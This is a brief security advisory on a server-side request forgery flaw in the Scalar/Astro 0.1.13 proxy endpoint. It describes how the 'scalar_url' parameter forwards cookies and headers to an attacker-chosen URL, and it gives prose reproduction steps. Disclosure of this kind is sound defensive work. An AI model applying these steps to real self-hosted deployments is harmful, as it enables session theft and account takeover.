Scalar/Astro Server-Side Request Forgery Vulnerability in Proxy Endpoint

A server-side request forgery (SSRF) vulnerability has been identified in Scalar/Astro version 0.1.13. The issue arises in the Scalar Proxy endpoint, where the 'scalar_url' query parameter allows unauthenticated attackers to send HTTP requests to URLs controlled by them. This vulnerability can lead to the exposure of authentication cookies and headers, and potentially allow for privilege escalation.

Impact

Exploitation of this vulnerability in self-hosted deployments can result in unauthorized access to user accounts by stealing session tokens. In contrast, the impact on Scalar's hosted instance is less severe, as the leaked cookies do not contain authentication tokens.

Reproduction

To reproduce this vulnerability, send a request to the Scalar Proxy endpoint with the 'scalar_url' parameter set to an attacker-controlled URL. The request must include the 'Cookie' header with the necessary authentication cookies. Once the request is processed, the server-side fetch will be made to the specified URL, forwarding the cookies and headers from the original request.